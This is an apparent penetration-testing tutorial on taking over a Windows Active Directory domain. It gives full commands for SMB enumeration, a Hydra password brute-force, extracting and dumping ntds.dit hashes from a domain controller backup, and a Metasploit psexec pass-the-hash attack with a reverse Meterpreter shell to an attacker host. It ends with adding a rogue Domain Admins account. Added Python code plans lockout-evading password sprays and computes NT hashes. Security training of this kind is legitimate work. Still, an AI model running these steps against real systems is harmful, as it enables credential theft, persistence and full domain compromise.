Grey Box Pentesting Scenario


Gray-Box Penetration Testing Scenario:

1. What will you learn?

In this article you will learn how to fully compromise a Windows domain environment without exploiting a single software vulnerability: every step relies on weak passwords, excessive access rights and poor network segmentation.

The article walks you, in detail, through how to:

  • use nmap scripts to enumerate the SMB service
  • use Hydra to brute-force an account over SMB
  • extract ntds.dit from a VHD backup of the domain controller
  • use Metasploit's psexec module with the pass-the-hash technique
  • perform post exploitation in the enterprise environment

2. Identify the live hosts and the main services

The most important thing to keep in mind in a penetration test is the scope. In our scenario the scope is 20 IP addresses in the IT department.

IP range will start from


 Figure 1: Simple network diagram for the scenario

By reviewing the rules of engagement it is easy to see that the IT admins have been placed in the same zone as the servers. That is a weakness in the network design: administrators should not share a zone with the core network servers. My recommendation is to put the IT admins in a separate zone, with a firewall between the two zones whose rules are tuned to what each admin role actually needs.

The other important thing in a penetration test is the methodology. Stick to your methodology and avoid skipping steps or jumping ahead; it is the best way to finish the project on time.

Note that the network-design weakness above is already our first finding, before any scanning has started. For the technical work we were given a starting point, as is usual in a gray-box test: the username PENTEST was created with normal (non-privileged) rights, to be used only for this activity.

One of the most powerful tools in penetration testing is nmap. In the following steps we use nmap with its SMB scripts to collect information about this domain. Let's start by identifying the live hosts and the services running on them:

# nmap -sP <Target-IPs>


We put our findings, the live hosts, in the file Targets.txt. (-sP is the legacy spelling of -sn: host discovery only, with no port scan.)

Now we run nmap with more options to identify the services on these hosts and their versions (adding -oA <basename> keeps normal, greppable and XML copies of the output, which is useful for the later steps):

# nmap -sV -sC -iL Targets.txt


From this output we can identify several things:

  • The servers run Windows Server 2008 R2 Enterprise (kernel version 6.1)
  • The domain name is pentest.corp.local
  • The computer names are PCL-DC-01 and PCL-FTP-01
  • Interesting services are exposed: DNS, SMB, LDAP and RPC over HTTP (DNS plus LDAP on PCL-DC-01 marks it as the domain controller)
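The facts in the list above were read off the nmap screen output. As an added example (mine, not part of the original article), the following Python script pulls the same facts out of the XML that nmap writes with -oX: the live hosts for Targets.txt, the open ports with a role label, and the host-script values such as the domain and computer name. The embedded XML is a constructed sample in nmap's schema, not the article's scan; the element keys under smb-os-discovery (os, server, domain_dns) and the addresses are assumed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for two hosts (not the article's scan). Element and
# attribute names follow nmap's XML schema; the <elem key="..."> names under
# smb-os-discovery are assumed for illustration.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -sC -iL Targets.txt -oX scan.xml">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="53"><state state="open"/><service name="domain" product="Microsoft DNS"/></port>
      <port protocol="tcp" portid="88"><state state="open"/><service name="kerberos-sec" product="Microsoft Windows Kerberos"/></port>
      <port protocol="tcp" portid="389"><state state="open"/><service name="ldap" product="Microsoft Windows Active Directory LDAP"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows Server 2008 R2 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered"/><service name="ms-wbt-server"/></port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="(omitted)">
        <elem key="os">Windows Server 2008 R2 Enterprise 7601 Service Pack 1</elem>
        <elem key="server">PCL-DC-01</elem>
        <elem key="domain_dns">pentest.corp.local</elem>
      </script>
    </hostscript>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.0.2.11" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

# Ports that matter when mapping a Windows domain; anything else keeps nmap's service name.
ROLE_BY_PORT = {53: "DNS", 88: "Kerberos", 135: "MSRPC", 139: "NetBIOS", 389: "LDAP",
                445: "SMB", 636: "LDAPS", 3268: "GlobalCatalog", 3389: "RDP", 5985: "WinRM"}


def parse_nmap_xml(xml_text):
    """Return one dict per live host: address, open ports, and host-script facts."""
    hosts = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue  # same semantics as the -sP/-sn sweep: only hosts that answered
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        ports = []
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # filtered/closed ports are not services we can talk to
            svc = port.find("service")
            ports.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
            })
        facts = {}
        for script in host.findall("./hostscript/script"):
            for elem in script.findall("elem"):
                facts[f"{script.get('id')}.{elem.get('key')}"] = (elem.text or "").strip()
        hosts.append({"addr": addr, "ports": ports, "facts": facts})
    return hosts


def live_targets(hosts):
    """Contents of Targets.txt: one live address per line."""
    return "".join(h["addr"] + "\n" for h in hosts)


def roles(host):
    """Human-readable role labels for a host's open ports."""
    return [ROLE_BY_PORT.get(p["port"], p["service"]) for p in host["ports"]]


def looks_like_dc(host):
    """Kerberos plus LDAP on the same box is the usual signature of a domain controller."""
    open_ports = {p["port"] for p in host["ports"]}
    return {88, 389}.issubset(open_ports)


if __name__ == "__main__":
    found = parse_nmap_xml(SAMPLE_XML)
    print(live_targets(found), end="")
    for h in found:
        print(h["addr"], "DC" if looks_like_dc(h) else "member", ", ".join(roles(h)))
        for key, value in sorted(h["facts"].items()):
            print("   ", key, "=", value)
```

Parsing the XML rather than the screen output means the host list, the service inventory and the script facts survive into the report unchanged, and the same script can be re-run on every scan of the engagement.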

3. Enumerating users through the SMB service

In this scenario we focus on the SMB service and use a few nmap scripts to get more information, authenticating with our PENTEST user. We start by enumerating the domain users with the following script:

# nmap --script smb-enum-users.nse --script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt


From the output we can easily identify the users in this domain:

  • Administrator, ftpuser, Guest, krbtgt, nuser, pentest

All of these are usable targets except Guest and krbtgt (both built-in accounts that are disabled by default), so we save the other usernames in a file UserNames.txt.

Next we enumerate the shared folders in this domain with the following script:

# nmap --script smb-enum-shares.nse --script-args=smbuser=pentest,smbpass=P@ssw0rd -p445 -n -iL Targets.txt


The output lists the shares on each host. On the other host only the default administrative shares are exposed:

  • ADMIN$, C$, IPC$

What we have found at this point is enough, in our scenario, to start working out how to capture the flag and gain full privileges on this domain.

4. After enumerating users, fire up the brute force

In this section we build a custom dictionary for a password attack based on the information we discovered about this domain.

I used a few guessed words to seed the file Pass.txt, then used John the Ripper's rules to expand it into the list Passwords.lst:

# john --wordlist=Pass.txt --rules --stdout > Passwords.lst


Then I used Hydra to try the list against the accounts found during the enumeration phase over SMB (Hydra needs the service name as the last argument, and the list file is the Passwords.lst we just generated):

# hydra -L UserNames.txt -P Passwords.lst -M Targets.txt -t 96 smb

Before running this against a live domain, check the account lockout policy (the nmap script smb-enum-domains reports the lockout threshold and the observation window): a few wrong guesses per account inside the window can lock out every user on your list.


Hydra found a second valid login: the account ftpuser with password ftpP@ssw0rd. Next we connect to the FTP server over Remote Desktop with this account.
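John and Hydra do this job in practice; the added Python example below (mine, not the article's) shows the two ideas behind the step in runnable form: expanding a handful of seed words with a small subset of john-style rules into a Passwords.lst-like list, and ordering the attempts as a password spray that stays below the domain's lockout threshold within each observation window, which Hydra's password-first ordering does not do for you. The seed words, user list and lockout values are constructed; read the real "Account lockout threshold" and "Reset account lockout counter after" values from the domain (nmap's smb-enum-domains script reports them) before using the plan against a live domain.

```python
# Constructed inputs, not the article's Pass.txt / UserNames.txt.
SEED_WORDS = ["pentest", "ftp", "welcome"]
USERS = ["Administrator", "ftpuser", "nuser", "pentest"]

LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})
SUFFIXES = ("", "!", "1", "123", "2013", "2014")


def expand(word):
    """A deterministic subset of john --rules: case variants, leet, common suffixes."""
    variants = [word, word.capitalize(), word.upper()]
    variants += [v.translate(LEET) for v in variants]
    out, seen = [], set()
    for v in variants:
        for suffix in SUFFIXES:
            cand = v + suffix
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def build_wordlist(seeds):
    """Equivalent of Passwords.lst: expansions of every seed, duplicates removed, order kept."""
    out, seen = [], set()
    for seed in seeds:
        for cand in expand(seed):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


def plan_spray(users, passwords, lockout_threshold, observation_window_s):
    """Order attempts password-first and cap failed attempts per user per window.

    lockout_threshold is the domain's 'Account lockout threshold' (0 = lockout
    disabled); observation_window_s is 'Reset account lockout counter after'
    in seconds. Returns rounds of (seconds to wait before the round, [(user, password), ...]).
    """
    if lockout_threshold == 0:
        return [(0, [(u, p) for p in passwords for u in users])]
    if lockout_threshold <= 2:
        raise ValueError("threshold too low: one or two failures lock the account; do not spray")
    per_window = lockout_threshold - 2  # two attempts of margin for the user's own typos
    rounds = []
    for start in range(0, len(passwords), per_window):
        chunk = passwords[start:start + per_window]
        delay = 0 if start == 0 else observation_window_s
        rounds.append((delay, [(u, p) for p in chunk for u in users]))
    return rounds


def max_attempts_per_user(rounds):
    """Worst-case failed attempts any single account sees within one round."""
    worst = 0
    for _, attempts in rounds:
        counts = {}
        for user, _ in attempts:
            counts[user] = counts.get(user, 0) + 1
        worst = max(worst, max(counts.values(), default=0))
    return worst


if __name__ == "__main__":
    wordlist = build_wordlist(SEED_WORDS)
    print(len(wordlist), "candidates, first few:", wordlist[:6])
    rounds = plan_spray(USERS, wordlist, lockout_threshold=5, observation_window_s=30 * 60)
    print(len(rounds), "rounds; worst case", max_attempts_per_user(rounds),
          "failures per account per window")
```

The plan is what you would feed to Hydra in batches (one small -P file per round, with a pause equal to the observation window between them) instead of letting it run the whole list against every account at once.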


Figure 2: use remote desktop connection to connect to FTP server

After logging in we start gathering information on this server. After a while we find a VHD file, PCL-DC-01.VHD.

The name suggests a backup of the domain controller; that was my first thought when I saw the file.

We mount the share on our machine and copy PCL-DC-01.VHD from it (using -o credentials=<file> instead of the password on the command line keeps the password out of the process list and shell history):

# mount -t cifs //<FTP-server-IP>/<share>$ -o username=ftpuser,password=ftpP@ssw0rd /mnt/FTP/


If you use Kali Linux you need to install this package before running the mount command:

# apt-get install cifs-utils



Figure 3: found PCL-DC-01.VHD file

5. Mount the VHD file and get ntds.dit and the SYSTEM, SAM and SECURITY hives

On Ubuntu 12.04/12.10, and on Kali, the tool for this is vdfuse. This FUSE module uses the VirtualBox disk access library to open any disk image format VirtualBox supports (VDI, VMDK and VHD, so our PCL-DC-01.VHD qualifies) and mount it as a FUSE file system. The mount point contains a flat directory with the files EntireDisk, Partition1 ... PartitionN, which can then be loop-mounted to access the underlying file systems.

To install vdfuse on Kali Linux run:

# apt-get install virtualbox-fuse

To mount the VHD file:

  • Mount the VHD file on a mount point with vdfuse
  • In that mount point you will find EntireDisk, Partition1 and Partition2
  • Loop-mount Partition2 (read-only, so the evidence is not altered) on another mount point
  • That second mount point is the C: partition of the domain controller

We make a directory NTDS and copy the NTDS folder from the mounted image PCL-DC-01.VHD into it; it contains the Active Directory database (ntds.dit) for the pentest.corp.local domain.

We also need the SAM, SECURITY and SYSTEM hives from the <mount-point>/Windows/System32/config/ folder. SYSTEM is essential: it holds the boot key that decrypts the password hashes stored in ntds.dit, so without it the database is of little use.

6. Dump the NTDS database and get the user hashes

First download the libesedb library (reference 9.1).

Extract and compile it with the usual commands:

# ./configure
# make
# make install



a. NTDSXtract

Second, download the NTDSXtract framework (reference 9.2).

This framework was developed to give the community a way to extract forensically important information from the main database of Microsoft Active Directory (NTDS.DIT).

The modules are capable of extracting information from NTDS.DIT files obtained from the following Windows versions:

  • Windows Server 2003 (32 & 64 bit)
  • Windows Server 2008 (32 & 64 bit)

The code is written in python and tested on the following platforms:

  • MacOS
  • Linux

The framework is capable of extracting information related to:

  • user objects
  • group objects
  • computer objects
  • deleted objects

b. NTDSXtract modules

Currently the following modules are included in the NTDSXtract framework:

  • dsfileinformation.py (time and date information related to the NTDS.DIT database file)
  • dstimeline.py (timeline generation module)
  • dsdeletedobjects.py (extracts information related to deleted objects)
  • dsusers.py (extracts information related to user objects)
  • dsgroups.py (extracts information related to group objects)
  • dscomputers.py (extracts information related to computer objects)

You can find more information at reference 9.3.

c. esedbexport

esedbexport (part of libesedb) exports the tables stored in an Extensible Storage Engine (ESE) database file; ntds.dit is such a file.

After installing libesedb, extract the database tables from the copied ntds.dit (here named extracted_ntds.dit). The -t option sets the output prefix, so the tables land in /tmp/ntds.dit.export/:

# esedbexport -l /tmp/esedbexport.log -t /tmp/ntds.dit extracted_ntds.dit


d. Use the NTDSXtract dsusers.py module

Extract the hashes, user info and password history:

# python dsusers.py /tmp/ntds.dit.export/datatable /tmp/ntds.dit.export/link_table --passwordhashes <SYSTEM file> --passwordhistory <SYSTEM file> --certificates --supplcreds <SYSTEM file> --membership > ntds.dit.output

Note: esedbexport appends a table number to each file, so the real names are datatable.[number] and link_table.[number]; take them from the previous output.

Filter the hashes from ntds.dit.output with the following command:

# grep -A 1 "Password hashes:" ntds.dit.output | grep "^[[:blank:]]"


e. Use the Metasploit ntds_hashextract.rb module

Alternatively, download the Metasploit tool that extracts usernames and hashes directly from the exported datatable (reference 9.4) and run it against that table and the SYSTEM hive:

# /usr/share/metasploit-framework/tools/ntds_hashextract.rb /tmp/ntds.dit.export/datatable.3 <SYSTEM file>


Now we are interested in the Administrator account. You have all the accounts with their hashes; you could try cracking them, but that can take far longer than the engagement allows.

In the following section we use the pass-the-hash technique to authenticate with the hashes without ever learning the passwords.

7. Use Metasploit's psexec module with the pass-the-hash technique

Warm up your hands as we get ready to capture the flag. Run Metasploit and use the psexec module as follows:

msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST <DC-IP>
msf exploit(psexec) > set SMBDomain pentest.corp.local
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST <attacker-IP>
msf exploit(psexec) > exploit


Congratulations: in figure 4 you can see that the pass-the-hash technique worked and we have a reverse Meterpreter session on the domain controller. Only the NT half of SMBPass matters here; the LM half aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty string, which tells you the domain no longer stores LM hashes. Keep in mind that psexec uploads and starts a service binary on the target, which is exactly where antivirus tends to interfere (see the summary).


Figure 4: Metasploit psexec module exploited and we got a reverse Meterpreter session
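The value given to set SMBPass above is LM:NT, and pass-the-hash works because the NT hash is an unsalted MD4 of the UTF-16LE password and is used directly in NTLM authentication. The added Python example below (mine, not from the article) implements MD4 in pure Python so it runs even where hashlib's md4 is disabled, derives an NT hash from a password, splits a dumped LM:NT pair the way psexec consumes it, and checks a guessed password against the NT half. The pwdump-style sample lines are constructed: the Administrator line reuses the hash quoted in the article without attributing any password to it, and the "demo" account and its RID are invented.

```python
import struct

MASK32 = 0xFFFFFFFF
# LM hash of the empty string: when a dump shows this in the LM slot, LM storage is off.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def _f(x, y, z):
    return (x & y) | (~x & z)


def _g(x, y, z):
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):
    return x ^ y ^ z


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320, in pure Python: hashlib's md4 is often missing under OpenSSL 3."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    h0, h1, h2, h3 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h0, h1, h2, h3
        # Each step updates one register; rotating the tuple keeps each round to one loop.
        for i in range(16):  # round 1: F, message words in order
            t = _rotl((a + _f(b, c, d) + x[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, t, b, c
        for i in range(16):  # round 2: G, column order, constant sqrt(2)
            k = (i % 4) * 4 + i // 4
            t = _rotl((a + _g(b, c, d) + x[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, t, b, c
        for i in range(16):  # round 3: H, bit-reversed order, constant sqrt(3)
            t = _rotl((a + _h(b, c, d) + x[round3_order[i]] + 0x6ED9EBA1) & MASK32,
                      (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, t, b, c
        h0, h1, h2, h3 = ((h0 + a) & MASK32, (h1 + b) & MASK32,
                          (h2 + c) & MASK32, (h3 + d) & MASK32)
    return struct.pack("<4I", h0, h1, h2, h3)


def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hash_pair(pair: str) -> dict:
    """Split the LM:NT string given to psexec's SMBPass."""
    lm, nt = pair.strip().lower().split(":")
    if len(lm) != 32 or len(nt) != 32:
        raise ValueError("expected two 32-hex-digit halves")
    return {"lm": lm, "nt": nt, "lm_disabled": lm == EMPTY_LM}


def parse_pwdump_line(line: str) -> dict:
    """One record in the common pwdump format: user:rid:lm:nt:::"""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), **parse_hash_pair(f"{lm}:{nt}")}


def matches(pair: str, candidate: str) -> bool:
    """Does a guessed password produce the NT half? A cheap sanity check on a Hydra hit."""
    return nt_hash(candidate) == parse_hash_pair(pair)["nt"]


# Constructed sample dump. The Administrator line reuses the article's hash; the
# "demo" account is invented and its NT hash is simply that of the word "password".
SAMPLE_DUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:f40b71a29d7723b7cb7e64a8d184dec4:::
demo:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""

if __name__ == "__main__":
    for line in SAMPLE_DUMP.splitlines():
        rec = parse_pwdump_line(line)
        print(rec["user"], "rid", rec["rid"], "NT", rec["nt"], "LM stored:", not rec["lm_disabled"])
    print("demo == 'password':",
          matches("aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c", "password"))
```

Because the NT hash has no salt, two accounts with the same NT value share a password, and a hash that matches a value already recovered elsewhere (for example from the Hydra hit) needs no cracking at all; this is also why the hash alone is a usable credential for psexec.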

8. Post exploitation: add a new user and make it a domain admin

Post exploitation in a penetration test can use many techniques to gather information about the network environment and can lead to further compromise in the domain.

One of the most important steps after getting a Meterpreter session is to obtain SYSTEM privileges and migrate into a stable process.

In this section I show how to add a new account to the Domain Admins group to maintain access to the pentest.corp.local domain.

In figure 5 you can see that I added a new user, pentestAdmin, to the domain, then listed all the groups on this domain controller, and finally added pentestAdmin to Domain Admins. Record the account in the report and remove it at the end of the engagement; creating a user and adding it to Domain Admins generates security events 4720 and 4728 on the domain controller, which any monitored environment should alert on.


Figure 5: post exploitation: add a user to the domain, then add it to the Domain Admins group

9. References

9.1.  http://pkgs.fedoraproject.org/repo/pkgs/libesedb/libesedb-alpha-20120102.tar.gz/198a30c98ca1b3cb46d10a12bef8deaf/libesedb-alpha-20120102.tar.gz

9.2. http://www.ntdsxtract.com/downloads/ntdsxtract/ntdsxtract_v1_0.zip

9.3. http://www.ntdsxtract.com

9.4. https://raw.github.com/pentestgeek/metasploit-framework/master/tools/ntds_hashextract.rb

10. Summary

All information in this article comes from a real penetration testing scenario. Some of the steps are straightforward; in practice you may need more skill to bypass restrictions such as antivirus, host intrusion prevention systems and firewalls.

The most important part of a penetration test is the reconnaissance and mapping phase. The more information you gather during the engagement, the better your chances of capturing the flag and compromising the network.

11. About the author

Basem Helmy | ECSA/LPT

He is an information security engineer specialising in offensive security, in particular penetration testing of networks and web applications in highly secured environments, with more than 3 years of experience.

LinkedIn: https://www.linkedin.com/in/bhelmy

Twitter: https://twitter.com/b4s3mh3lmy

